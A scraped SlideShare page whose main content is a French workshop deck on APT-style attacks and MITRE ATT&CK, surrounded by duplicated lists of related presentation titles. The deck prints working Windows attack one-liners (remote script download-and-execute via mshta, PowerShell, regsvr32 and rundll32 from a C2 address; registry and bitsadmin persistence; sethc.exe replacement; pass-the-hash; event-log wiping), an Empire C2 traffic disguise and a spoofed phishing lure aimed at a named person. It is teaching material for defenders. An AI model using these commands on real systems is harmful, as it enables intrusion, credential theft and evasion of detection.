Rapport Threat Intelligence Check Point du 23 mai 2016Rapport Threat Intelligence Check Point du 23 mai 2016
Rapport Threat Intelligence Check Point du 23 mai 2016
Blandine Delaporte
 
Bq101 g formation-ibm-security-qradar-siem-foundations
Bq101 g formation-ibm-security-qradar-siem-foundationsBq101 g formation-ibm-security-qradar-siem-foundations
Bq101 g formation-ibm-security-qradar-siem-foundations
CERTyou Formation
 
8-securite_reseaux.pdf
8-securite_reseaux.pdf8-securite_reseaux.pdf
8-securite_reseaux.pdf
ssuserbd922f
 
2018.02.06 commission sécurité cloud - Présentation Serge Hartmann
2018.02.06 commission sécurité cloud - Présentation Serge Hartmann2018.02.06 commission sécurité cloud - Présentation Serge Hartmann
2018.02.06 commission sécurité cloud - Présentation Serge Hartmann
TelecomValley
 
Intelligence économique : Le monitoring
Intelligence économique : Le monitoringIntelligence économique : Le monitoring
Intelligence économique : Le monitoring
Khalifa Tall
 

Similaire à Cyber attaques APT avec le framework MITRE ATT&CK (20)

On a volé les clefs de mon SI !
On a volé les clefs de mon SI !On a volé les clefs de mon SI !
On a volé les clefs de mon SI !
 
Formation Securite Informatique AKAOMA Consulting Certification Securite Info...
Formation Securite Informatique AKAOMA Consulting Certification Securite Info...Formation Securite Informatique AKAOMA Consulting Certification Securite Info...
Formation Securite Informatique AKAOMA Consulting Certification Securite Info...
 
Cyber threat intelligence
Cyber threat intelligenceCyber threat intelligence
Cyber threat intelligence
 
Copy of PARTIE-1 Introduction à la cyber sécurité.pdf
Copy of PARTIE-1 Introduction à la cyber sécurité.pdfCopy of PARTIE-1 Introduction à la cyber sécurité.pdf
Copy of PARTIE-1 Introduction à la cyber sécurité.pdf
 
Barcamp presentation Cybersecurite by saphia
Barcamp presentation Cybersecurite by saphiaBarcamp presentation Cybersecurite by saphia
Barcamp presentation Cybersecurite by saphia
 
Snort
SnortSnort
Snort
 
070219 Webinar Sensibilisation Sécurité Logiciel Everteam
070219 Webinar Sensibilisation Sécurité Logiciel Everteam070219 Webinar Sensibilisation Sécurité Logiciel Everteam
070219 Webinar Sensibilisation Sécurité Logiciel Everteam
 
siris1.pdf
siris1.pdfsiris1.pdf
siris1.pdf
 
Jeudi de l AFAI - Evolutions des menaces et adaptation des SOC
Jeudi de l AFAI - Evolutions des menaces et adaptation des SOCJeudi de l AFAI - Evolutions des menaces et adaptation des SOC
Jeudi de l AFAI - Evolutions des menaces et adaptation des SOC
 
Resume-theorique-M209-V1-version-provisoire-0909_2.pdf
Resume-theorique-M209-V1-version-provisoire-0909_2.pdfResume-theorique-M209-V1-version-provisoire-0909_2.pdf
Resume-theorique-M209-V1-version-provisoire-0909_2.pdf
 
Sécurisation d'un site internet
Sécurisation d'un site internetSécurisation d'un site internet
Sécurisation d'un site internet
 
Baromètre BlackNoise 2022.pdf
Baromètre BlackNoise 2022.pdfBaromètre BlackNoise 2022.pdf
Baromètre BlackNoise 2022.pdf
 
Cours sécurité 2_asr
Cours sécurité 2_asrCours sécurité 2_asr
Cours sécurité 2_asr
 
Bq100 g formation-ibm-security-qradar-siem-7-1-foundations
Bq100 g formation-ibm-security-qradar-siem-7-1-foundationsBq100 g formation-ibm-security-qradar-siem-7-1-foundations
Bq100 g formation-ibm-security-qradar-siem-7-1-foundations
 
Starc by Exaprobe
Starc by ExaprobeStarc by Exaprobe
Starc by Exaprobe
 
Rapport Threat Intelligence Check Point du 23 mai 2016
Rapport Threat Intelligence Check Point du 23 mai 2016Rapport Threat Intelligence Check Point du 23 mai 2016
Rapport Threat Intelligence Check Point du 23 mai 2016
 
Bq101 g formation-ibm-security-qradar-siem-foundations
Bq101 g formation-ibm-security-qradar-siem-foundationsBq101 g formation-ibm-security-qradar-siem-foundations
Bq101 g formation-ibm-security-qradar-siem-foundations
 
8-securite_reseaux.pdf
8-securite_reseaux.pdf8-securite_reseaux.pdf
8-securite_reseaux.pdf
 
2018.02.06 commission sécurité cloud - Présentation Serge Hartmann
2018.02.06 commission sécurité cloud - Présentation Serge Hartmann2018.02.06 commission sécurité cloud - Présentation Serge Hartmann
2018.02.06 commission sécurité cloud - Présentation Serge Hartmann
 
Intelligence économique : Le monitoring
Intelligence économique : Le monitoringIntelligence économique : Le monitoring
Intelligence économique : Le monitoring
 

Plus de EyesOpen Association

COLLECT AND ANALYZE RAM FOR DIGITAL INVESTIGATION
COLLECT AND ANALYZE RAM FOR DIGITAL INVESTIGATIONCOLLECT AND ANALYZE RAM FOR DIGITAL INVESTIGATION
COLLECT AND ANALYZE RAM FOR DIGITAL INVESTIGATION
EyesOpen Association
 
Ransomware : Challenges and best practices
Ransomware : Challenges and best practices Ransomware : Challenges and best practices
Ransomware : Challenges and best practices
EyesOpen Association
 
Gestion des Incidents: prendre le contrôle de votre processus
Gestion des Incidents: prendre le contrôle de votre processus Gestion des Incidents: prendre le contrôle de votre processus
Gestion des Incidents: prendre le contrôle de votre processus
EyesOpen Association
 
Art du threat Modeling : Modéliser les menaces informatiques avec la méthode ...
Art du threat Modeling : Modéliser les menaces informatiques avec la méthode ...Art du threat Modeling : Modéliser les menaces informatiques avec la méthode ...
Art du threat Modeling : Modéliser les menaces informatiques avec la méthode ...
EyesOpen Association
 
Case studies in cybersecurity strategies
Case studies in cybersecurity strategiesCase studies in cybersecurity strategies
Case studies in cybersecurity strategies
EyesOpen Association
 
Cyber and information security operations and assurance
Cyber and information security operations and assurance Cyber and information security operations and assurance
Cyber and information security operations and assurance
EyesOpen Association
 
Zero Trust : How to Get Started
Zero Trust : How to Get StartedZero Trust : How to Get Started
Zero Trust : How to Get Started
EyesOpen Association
 
CTFaaS pour la cybereducation
CTFaaS pour la cybereducationCTFaaS pour la cybereducation
CTFaaS pour la cybereducation
EyesOpen Association
 
Phishing mails: Bonnes pratiques
Phishing mails: Bonnes pratiques Phishing mails: Bonnes pratiques
Phishing mails: Bonnes pratiques
EyesOpen Association
 
Internal and External threats to a corporate network : Bypassing perimeter de...
Internal and External threats to a corporate network : Bypassing perimeter de...Internal and External threats to a corporate network : Bypassing perimeter de...
Internal and External threats to a corporate network : Bypassing perimeter de...
EyesOpen Association
 
Cybersecurity Competencies and the Future of Work
Cybersecurity Competencies and the Future of Work Cybersecurity Competencies and the Future of Work
Cybersecurity Competencies and the Future of Work
EyesOpen Association
 
Approche de sécurisation des identités: Cas de Active Directory
Approche de sécurisation des identités: Cas de Active DirectoryApproche de sécurisation des identités: Cas de Active Directory
Approche de sécurisation des identités: Cas de Active Directory
EyesOpen Association
 
Cyber threat intelligence avec Open CTI
Cyber threat intelligence avec Open CTI Cyber threat intelligence avec Open CTI
Cyber threat intelligence avec Open CTI
EyesOpen Association
 
Le rôle de la sensibilisation et de la formation à la cybersécurité
Le rôle de la sensibilisation et de la formation à la cybersécuritéLe rôle de la sensibilisation et de la formation à la cybersécurité
Le rôle de la sensibilisation et de la formation à la cybersécurité
EyesOpen Association
 
Cyber psychology: Understand your cyber security mental health culture
Cyber psychology: Understand your cyber security mental health culture Cyber psychology: Understand your cyber security mental health culture
Cyber psychology: Understand your cyber security mental health culture
EyesOpen Association
 
La sécurité des API: Quand les mauvais élèves entrent en piste.
La sécurité des API: Quand les mauvais élèves entrent en piste.La sécurité des API: Quand les mauvais élèves entrent en piste.
La sécurité des API: Quand les mauvais élèves entrent en piste.
EyesOpen Association
 
Programme de cybersécurité : Implementer le framework NIST CSF en entreprise
Programme de cybersécurité : Implementer le framework NIST CSF en entrepriseProgramme de cybersécurité : Implementer le framework NIST CSF en entreprise
Programme de cybersécurité : Implementer le framework NIST CSF en entreprise
EyesOpen Association
 
Cyberguerre et Cyberdéfense: les nouveaux enjeux pour l’Afrique
Cyberguerre et Cyberdéfense: les nouveaux enjeux pour l’Afrique Cyberguerre et Cyberdéfense: les nouveaux enjeux pour l’Afrique
Cyberguerre et Cyberdéfense: les nouveaux enjeux pour l’Afrique
EyesOpen Association
 
Report: Digital Transformation and Application Security Posture in West and C...
Report: Digital Transformation and Application Security Posture in West and C...Report: Digital Transformation and Application Security Posture in West and C...
Report: Digital Transformation and Application Security Posture in West and C...
EyesOpen Association
 
Effective Information Security Risk and Controls Management
Effective Information Security Risk and Controls Management Effective Information Security Risk and Controls Management
Effective Information Security Risk and Controls Management
EyesOpen Association
 

Plus de EyesOpen Association (20)

COLLECT AND ANALYZE RAM FOR DIGITAL INVESTIGATION
COLLECT AND ANALYZE RAM FOR DIGITAL INVESTIGATIONCOLLECT AND ANALYZE RAM FOR DIGITAL INVESTIGATION
COLLECT AND ANALYZE RAM FOR DIGITAL INVESTIGATION
 
Ransomware : Challenges and best practices
Ransomware : Challenges and best practices Ransomware : Challenges and best practices
Ransomware : Challenges and best practices
 
Gestion des Incidents: prendre le contrôle de votre processus
Gestion des Incidents: prendre le contrôle de votre processus Gestion des Incidents: prendre le contrôle de votre processus
Gestion des Incidents: prendre le contrôle de votre processus
 
Art du threat Modeling : Modéliser les menaces informatiques avec la méthode ...
Art du threat Modeling : Modéliser les menaces informatiques avec la méthode ...Art du threat Modeling : Modéliser les menaces informatiques avec la méthode ...
Art du threat Modeling : Modéliser les menaces informatiques avec la méthode ...
 
Case studies in cybersecurity strategies
Case studies in cybersecurity strategiesCase studies in cybersecurity strategies
Case studies in cybersecurity strategies
 
Cyber and information security operations and assurance
Cyber and information security operations and assurance Cyber and information security operations and assurance
Cyber and information security operations and assurance
 
Zero Trust : How to Get Started
Zero Trust : How to Get StartedZero Trust : How to Get Started
Zero Trust : How to Get Started
 
CTFaaS pour la cybereducation
CTFaaS pour la cybereducationCTFaaS pour la cybereducation
CTFaaS pour la cybereducation
 
Phishing mails: Bonnes pratiques
Phishing mails: Bonnes pratiques Phishing mails: Bonnes pratiques
Phishing mails: Bonnes pratiques
 
Internal and External threats to a corporate network : Bypassing perimeter de...
Internal and External threats to a corporate network : Bypassing perimeter de...Internal and External threats to a corporate network : Bypassing perimeter de...
Internal and External threats to a corporate network : Bypassing perimeter de...
 
Cybersecurity Competencies and the Future of Work
Cybersecurity Competencies and the Future of Work Cybersecurity Competencies and the Future of Work
Cybersecurity Competencies and the Future of Work
 
Approche de sécurisation des identités: Cas de Active Directory
Approche de sécurisation des identités: Cas de Active DirectoryApproche de sécurisation des identités: Cas de Active Directory
Approche de sécurisation des identités: Cas de Active Directory
 
Cyber threat intelligence avec Open CTI
Cyber threat intelligence avec Open CTI Cyber threat intelligence avec Open CTI
Cyber threat intelligence avec Open CTI
 
Le rôle de la sensibilisation et de la formation à la cybersécurité
Le rôle de la sensibilisation et de la formation à la cybersécuritéLe rôle de la sensibilisation et de la formation à la cybersécurité
Le rôle de la sensibilisation et de la formation à la cybersécurité
 
Cyber psychology: Understand your cyber security mental health culture
Cyber psychology: Understand your cyber security mental health culture Cyber psychology: Understand your cyber security mental health culture
Cyber psychology: Understand your cyber security mental health culture
 
La sécurité des API: Quand les mauvais élèves entrent en piste.
La sécurité des API: Quand les mauvais élèves entrent en piste.La sécurité des API: Quand les mauvais élèves entrent en piste.
La sécurité des API: Quand les mauvais élèves entrent en piste.
 
Programme de cybersécurité : Implementer le framework NIST CSF en entreprise
Programme de cybersécurité : Implementer le framework NIST CSF en entrepriseProgramme de cybersécurité : Implementer le framework NIST CSF en entreprise
Programme de cybersécurité : Implementer le framework NIST CSF en entreprise
 
Cyberguerre et Cyberdéfense: les nouveaux enjeux pour l’Afrique
Cyberguerre et Cyberdéfense: les nouveaux enjeux pour l’Afrique Cyberguerre et Cyberdéfense: les nouveaux enjeux pour l’Afrique
Cyberguerre et Cyberdéfense: les nouveaux enjeux pour l’Afrique
 
Report: Digital Transformation and Application Security Posture in West and C...
Report: Digital Transformation and Application Security Posture in West and C...Report: Digital Transformation and Application Security Posture in West and C...
Report: Digital Transformation and Application Security Posture in West and C...
 
Effective Information Security Risk and Controls Management
Effective Information Security Risk and Controls Management Effective Information Security Risk and Controls Management
Effective Information Security Risk and Controls Management
 

Cyber attaques APT avec le framework MITRE ATT&CK

  • 2. ABENE Bertin, Spécialiste en Cybersécurité Responsable Sécurité Système d’Information - * Codeur | Bloggeur |Formateur @thebenygreen @237hackers @eyesopsec http://gacksecurity.blogspot.com Trainer Auteur de Beefstrike 2012 - 2014 2015 2016 #237HackersWorkshop Session 01 : Cyberattaques avancées type APT Beefstrike utilise CORTANA, un projet né du programme Cyber Fast Track DARPA du Département de la Défense des États-Unis https://opencatalog.darpa.mil/CFT.html https://github.com/benyG/Beefstrike/ >whoami 2
  • 3. Avertissement ! #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Au cours de cet atelier, les participants apprendront les méthodes utilisées dans le cybercrime et pourrons même en reproduire avec succès. Plus précisément certaines des attaques répertoriées dans le Framework MITRE ATT&CK. Le but de cet atelier est de permettre aux participants de mieux défendre les systèmes placés sous leur responsabilité ou ceux de leurs clients. De participer de ce fait grâce à leur maîtrise des risques, à la construction d’un cyber espace plus sûre. Les participants s’engagent à n’utiliser les informations communiquées dans cet atelier que dans un cadre strictement légale et à des fins conformes à l’éthique. La responsabilité du formateur ne sera en aucun cas engagée si certains participants venaient à déroger à cette clause ayant validé leur participation. 3
  • 4. PLAN #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT 1. Introduction 2. Cyberattaque, Quesaco ? 3. Cyberattaques ciblées 4. Cyberattaques avancées (APT) 5. Référencement des APT 6. MITRE ATT&CK Framework 7. Schémas tactique standard 8. Exploration des techniques APT 9. ATELIER PRATIQUE : Simulation d’une attaque type APT 10. Protection contre les cyberattaques APT 11. Conclusion Niveau de complexité 4
  • 5. Cyberattaque, Quesaco ? #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Attaque active : acte (malveillant) modifiant ou altérant les ressources ciblées par l’attaque (atteinte à l’intégrité, à la disponibilité et à la confidentialité des données) .  Loi du 21/12/2010 relative à la cybersécurité et à la cybercriminalité au Cameroun 18 million de nouveau malware en 2016 soit 200 000 par jour  Panda Labs 4000 Attaques de Ransomware par jour  Computer Crime & Intellectual Property Section (CCIPS) Motivations des cyberattaques - Juin 2018 -> https://www.hackmageddon.com/2018/07/23/june-2018-cyber-attacks-statistics/ QUELQUES CHIFFRES 5
  • 6. Cyberattaque ciblée #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Une cyberattaque peut générer une crise majeure pouvant remettre en cause la survie même de l’entreprise. Principales conséquences :  Financières  Juridiques  Réputationnelles  Humaines Cyberattaque, Quesaco ? Les impacts https://www.lamontagne.fr/clermont-ferrand/economie/commerce-artisanat/2017/09/22/victime-d-un- piratage-informatique-la-societe-clermont-pieces-va-fermer-boutique_12561803.html 6 National Cyber Security Alliance révèle que: +60% des PME attaque ciblée cessent leurs activités après 06 mois.
  • 7. Cyberattaque, Quesaco ? Les 4 constituantes d’une cyberattaque #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Attaquants Cibles Motivations Techniques  Loup solitaire  Activistes  Organisation  Groupes  Terroristes  Etats  Entreprises  individu  Activistes  Organisation  Groupes  Aléatoires  Terroristes  Etats  Entreprises  Financière  Destruction  Espionnage  Vol des données  Réputation  Basiques  Professionnelles  Avancées Loup solitaire  Aléatoires  Financière  Basiques Groupe  Aléatoires  Réputation  Basiques 7
  • 8. Cyberattaque ciblée #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Attaque Ciblées / Targeted attack Cyberattaque ayant la particularité de ne pas viser de cible aléatoirement. Au contraire, elle vise une cible précisément sélectionnées pour des raisons en relation avec les objectifs de l’attaque Phase clé de sélection  RECONNAISSANCE Activistes  Etats  Réputation  Basiques Entreprises  Entreprises  Vol des données  Professionnelles 8
  • 9. Cyberattaque ciblée Schémas tactique des cyberattaques ciblées #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Recon Weaponize Delivery Exploitation Installation Command & Control Actions Cyber Kill Chain Lockheed Martin Cybersecurity kill chain is a framework developed by Lockheed Martin for identification and prevention of cyber intrusions activity. As attacks may occur in stages, you as defender can put optics and controls to detect or disrupt the entire process.9
  • 10. Cyberattaque avancée ( type APT ) #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Advanced Persistent Threat Menace Persistante Avancée Menace de par son caractère dangereux pour la cible Dans toutes les attaques APT. L’objectifs est de maintenir une présence furtive long termes au cœur du système cible. Les outils et techniques utilisées trahissent la bonne organisation, les compétences élevées des attaquants et les moyens financiers conséquents mis à disposition pour l’execution de l’attaque. L'APT utilise un ensemble évolutif de tactiques, de techniques et de procédures (TTP) pour établir et maintenir une présence dans l'infrastructure informatique de la cible et exploiter ce potentiel pour exfiltrer d'importants volumes d'informations sensibles, corrompre les informations critiques ou dégrader les capacités 10
  • 11. Cyberattaque avancée ( type APT ) Particularités des constituantes #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Attaquants Cibles Motivations Techniques  Organisations  Groupes  Etats  Entreprises  Organisations  Groupes  Etats  Entreprises  Financières  Espionnage  Vol de données  Avancées Etats  Etats  Espionnage/Vol  Avancées Groupes  Entreprises  Financières  Avancées Etats  Organisations  Espionnage/Vol  Avancées 11
  • 12. Référencement des APT #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT https://www.fireeye.com/current-threats/apt-groups.html 12
  • 13. MITRE ATT&CK Framework #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT MITRE a mis au point (ATT&CK ™), une base de connaissances et un modèle pour le comportement des cyber-adversaires, reflétant les différentes phases du cycle de vie de l’adversaire et les plates- formes qu’ils sont censés cibler. Technique Description Persistence Privilege Escalation Defense Evasion Credential Access Discovery Lateral Movement Execution Collection Exfiltration Command and Control (C2) Techniques de présence persistante sur un système compromis Techniques permettant à l'adversaire d'obtenir un niveau plus élevé d'autorisations Techniques que les adversaires utilisent pour échapper à la détection ou l’éviter Techniques permettant d'accéder ou de contrôler les informations d'identification des systèmes, du domaine ou des services Techniques permettant à l'adversaire d'acquérir des connaissances sur le système et le réseau interne Techniques permettant à un adversaire d'accéder et de contrôler des systèmes distants au sein du réseau cible Techniques permettant l'exécution de code contrôlé par l'adversaire sur un système local ou distant Techniques utilisées pour identifier et collecter des informations Techniques qui aident l'adversaire à exfiltrer des fichiers et les données d'un réseau cible Techniques représentant la manière dont les adversaires communiquent avec les systèmes sous leur contrôle au sein d'un réseau cible https://attack.mitre.org/wiki/Main_Page 13
  • 14. APT: Schémas tactique standard #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT 14 Build social Engineering Attack scenario
  • 15. Installation de l’infra C2 #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Modèle d’infra C2 Segmenter les composantes fonctionnelles de l’infrastructure en couche offre la flexibilité et la résilience face aux actions préventives Empêche l'identification du cœur de l’infra et sème la confusion Redirection Layer Utilisé essentiellement pour la phase Delivery Phishing Layer Héberge la charge offensive qui attaquera les cibles Payload Delivery Layer Contrôle des opérations Control Layer victime Attaquants 15
  • 16. Installation de l’infra C2 #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Communication: Channels et Profiles  Les channels sont les protocoles+services utilisés pour le trafic vers le C2. En générale le choix vise à éveiller le moins de suspicion (exple: https+twitter)  Les profiles C2 permettent à l’attaquant d’imiter un channel, et ainsi déterminer comment le trafic vers le C2 sera vu sur le réseau. Dès lors on a 02 options avec les profiles: 1. Faire passer le trafic pour légitime en utilisant l’empreinte réseau des applications metier utilisées sur le réseau cible (exemple: Exchange Online, Sage Online, …)  Red Teaming 2. Simuler l’empreinte réseau d’une menace spécifiques connues pour évaluer la réponse de nos défense  Adversary Emulation/Simulation 16 Trafic généré par un sample du bot Zeus https://digital-forensics.sans.org/blog/2014/03/31/the- importance-of-command-and-control-analysis-for- incident-response
  • 17. Recon #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT OSINT SCAN Scan des ports Enumération des services Scan de vulnérabilité Sources OSINT • Moteurs de recherche • Réseaux sociaux • Sites d’annonces • …etc • Nom des cibles clé • Email • Téléphone • Intérêts • etc • IP • Services • Applications • Vulnérabilités • Etc C’est de loin l’étape la plus importante Non-intrusif Intrusif Utilisateurs, Organisations, … data Big data 17
  • 18. Tactique: Weaponize #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT  Binder : Ajouter un fichier exe dans un fichier exe  Fichier Office piégé avec macro  Watering hole  Exploits embarqués (exe, page web, …)  etc 18 Techniques
  • 19. Tactique: Execution #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Techniques - CMSTP: executer du code via les fichiers INF [T1191] cmstp.exe C:eo.inf /au - DDE : usage de la fonctionnalité Dynamic Data Execution d’Office [T1173] Insert-> Quick Parts-> Field -> {DDEAUTO c:windowssystem32cmd.exe "/k calc.exe"} - MSHTA[T1170] : mshta.exe javascript:a=(GetObject("script:http://192.168.43.203:5000/mshta/eo.sct")).Exec();close(); - POWERSHELL [T1086] : powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://192.168.43.203:5000/psh/eo.ps1’) - REGSVR32 [T1117] : regsvr32.exe /s /u /i:http://192.168.43.203:5000/cmstp/eo.sct scrobj.dll 19
  • 20. Tactique: Execution #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Techniques - RUNDLL32 [T1085] : • Rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.43.203:5000/rundll32/eo.sct").Exec();“ • Rundll32 SHELL32.DLL,ShellExec_RunDLL "calc" - SCHTASKS [T1035] : SCHTASKS /Create /SC ONCE /TN eotask /TR calc /ST 12:54 - WMI [T1047]: WMIC process call create "cmd.exe /c calc“ WMIC /node:ComputerName process call create “cmd.exe /c calc.exe” wmic os get /format:"http://192.168.43.203:5000/xsl/eo.xsl" - WINRM : winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} - WSCRIPT 20
  • 21. Tactique: Persistence #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Techniques - BROWSER EXTENSION [T1191] : chrome://extensions -> « Load unpacked extension » - BITSADMIN: Background Intelligent Transfer Service [T1197] bitsadmin.exe /transfer /Download /priority Foreground http://192.168.43.203:5000/psh/eo.ps1 eo.bat - REGISTRY [T1060] : REG ADD HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun /V EO /t REG_SZ /F /D calc - STARTUP FOLDER [T1060] : C:ProgramDataMicrosoftWindowsStart MenuProgramsStartUp - LOGON SCRIPT[T1117] : REG ADD HKCUEnvironment /v UserInitMprLogonScript /t REG_MULTI_SZ /d calc - WMI Event Subscription [T1084] - SCHTASKS [T1035] : SCHTASKS /Create /SC ONCE /TN eotask /TR calc /ST 12:54 21
  • 22. Tactique: Privileges escalation (privesc) #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Techniques - EXPLOIT LOCAUX : MS10-015 : User Mode to Ring (KiTrap0D), MS10-092 : Task Scheduler MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow MS13-081 : TrackPopupMenuEx Win32k NULL Page MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference MS15-051 : ClientCopyImage Win32k, MS15-078 : Font Driver Buffer Overflow MS16-016 : 'mrxdav.sys' WebDAV, MS16-032 : Secondary Logon Handle - EVENTVIEWER UAC BYPASS - SETHC BINARY SWAPPING [T1015] takeown.exe C:Windowssystem32sethc.exe & del C:Windowssystem32sethc.exe & copy C:Windowssystem32cmd.exe C:Windowssystem32sethc.exe 22
  • 23. Tactique: Lateral Movement #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Techniques - PSEXEC [T1002] : psexec /accepteula 192.168.10.1 -s cmd.exe (Run cmd.exe on the remote box as the SYSTEM user account) psexec /accepteula ip -u domainuser -p lm:ntlm cmd.exe /c dir c:Progra~1 (Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash) - MIMIKATZ [T1191] : mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm} - WMI [T1191] : 23
  • 24. Tactique: Credentials access #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Techniques - CREDENTIALS DUMPING [T1003] : Extraction des Hash des mots de passe Extraction des mots de passe en clair - KEYLOGGER: Enregistrement des frappes clavier - PHISHING: incitation frauduleuse à transmettre des informations 24
  • 25. Tactique: Defense Evasion #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Techniques - Obfuscation [T1027] : Import-Module ./Invoke-Obfuscator.psd1; https://javascriptobfuscator.com/Javascript-Obfuscator.aspx - Encryption: aes, blowfish, rsa - Encoding [T1027] exemple: ascii, unicode, url encoding, base64 https://javascriptobfuscator.com/Javascript-Obfuscator.aspx - Bypass Application whitelisting: Regsvr32, Rundll32, Installutil, Mshta, CMSTP… - CODE SIGNING[T1116] - DISABLING SECURITY TOOLS [T1089]: wevtutil el | Foreach-Object {wevtutil cl $_} - TIMESTOMP [T1099] 25
  • 26. Tactique: Discovery #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT 26 • Users account Discovery • File and Directory Discovery • Remote System Discovery • Services Discovery • Software discovery • Configurations Discovery • etc
  • 27. Tactique: Compression & Exfiltration #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT Techniques - ZIP - RAR - etc Techniques - Exfiltration via service HTTP - Exfiltration via serveur FTP - Exfiltration via des API de service Web (Github, Pastebin, …etc) 27 Exfiltration Compression
  • 28. #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
  • 29. Scenario du LAB #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT L’entreprise EMIZOPLAYA CORP exerce ses activités dans le domaine de la logistique et elle se porte plutôt bien depuis plus de 05 ans. Son chiffre d’affaire ne cesse de croître. EMIZOPLAYA CORP s’est récemment vu attribuer un important marché n7030 d’une valeur de 530 million. 29Threat actor : APT98 Vous allez jouer le rôle de cette entité Pour des motivations X et Y une entité a été contactée pour établir une présence durable au sein du système d’information de l’entreprise EMIZOPLAYA CORP à fin d’obtenir des données liés à ses succès et à l’attribution du marché n7030
  • 30. Configuration du Réseau du LAB #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT 30 Serveur - DC - Files Antoine ZOPLAYA (DG) Nom PC: cli02 IP: 192.168.10.22 Jessica MAMU (CP) Nom PC: cli01 IP: 192.168.10.21 C2 infra - APT98 autres APT98 Team (Internet) Céline FOTSO (Sysadmin) Nom PC: DC01 IP: 192.168.10.1 Domain: emizoplaya.com 192.168.10.203 192.168.43.203 Internet virtuel Wifi: Eolab 192.168.10.10 NAT Naviguons pour tester les accès aux fichiers
  • 31. Choix de l’outil du LAB #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT • Cobalt Strike • Caldera • Atomic Redteam • Invoke-Adversary • RedTeam Automation • Empire • etc 31
  • 32. Empire PowerShell #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT  Les Listeners sont les canaux qui reçoivent des connexions de notre machine cible.  Les stagers sont des charges « explosives » utilisées pour créer une connexion avec le C2  Les agents sont les connexions créé avec les machines attaquées avec succès.  Les modules sont des commandes spécifiques exécutable sur une machine victime Listeners Stagers Agents 32 Modules Début victime Results
  • 33. Setup C2 #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT GET request URI | User Agent | Header #1Format de profile : 33 Changer de profile Supprimer la DB empire.db, editer là et redémarrer empire  exemple profile BING search : set DefaultProfile /owa/mail/inbox.srf,/owa/mail/drafts.srf,/owa/mail/archive.srf|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko|Accept:*/* set ServerVersion "Microsoft-IIS/8.5« page = """<!DOCTYPE html><html > … </html> """ Modifier la réponse HTTP par défaut en éditant le fichier : lib/common/http.py
  • 34. Scenario #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT EXECUTION DE LA PHASE RECON: Site web linkedin Site annonce twitter intérêt contact Social engineering scenario 34 Nom CP Cpte twitter Rolex Nom CP Contact CP Résultats Jessica MAMU BEKOSSI Employé à EMIZOPLAYA Chef de Projet à EMIZOPLAYA CORP Diplômé de l’ESSEC, Certifié PMP Passionnée de ROLEX Twitter: https://twitter.com/jessmak18 Contact: jessmamu02@yahoo.fr
  • 35. Scenario #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT WEAPONIZING PHASE : Un fichier excel avec une macro malveillante qui établi la connection initiale avec le C2 35 Construction du scénario d’ ingénierie sociale Jessisa MAMU BEKOSSI = Cible La maison ROLEX contacte JESSICA pour l’informer de sa sélection pour participer gratuitement au lancement du programme « Rolex Elite Fans » Qui a pour but de permettre aux Fans de la marque de montre luxe de participer au choix des montres qui apparaitront sur le catalogue de l’année 2019. Il est précisé qu’aucune information personnelle ne sera demandée aux participants à ce programme DELIVERY PHASE : Service de email spoofing : https://emkei.cz/ Bill Mosse, un responsable de chez ROLEX envoi le fichier bill.mosse@rolex.com
  • 36. Scenario #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT DEFENSE EVASION PHASE: - Obfuscation du code - Modification du profile C2 - Bypass Firewall usage port 80 36 Techniques Résultats On observera aussi par la suite
  • 37. Scenario #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT DISCOVERY PHASE: On veut connaître: - Nom machine et Compte utilisée - Les machines en présence - Les utilisateurs - Les partages - Les services - Les contrôleurs de domaine 37 Hostname + Whoami Aprscan Invoke-DCSync Share_finder + Get_ChildItem Portscan Get_domain_controller Commandes/Techniques Résultats Session: jmamu - Session non privilégiée Machines présentes: 192.168.10.21, 22, 1 Domaine: emizoplaya.com DC: dc01.emizoplaya.com Utilisateurs: jmamu, cfotso, azoplaya, mmbondo, pouedraogo, … Partages: 192.168.10.1Business
  • 38. Scenario #237HackersWorkshop - Session 01 : Cyberattaques avancées type APT PRIVILEGES ESCALATION PHASE: - Check admin state - bypassUAC_eventviewer  Nouvel agent: - Re-check admin state - Whoami - Rename new agent 38 Commandes/Techniques Résultats Nouvelle session: jmamu - LOCAL PRIVILEGIEE
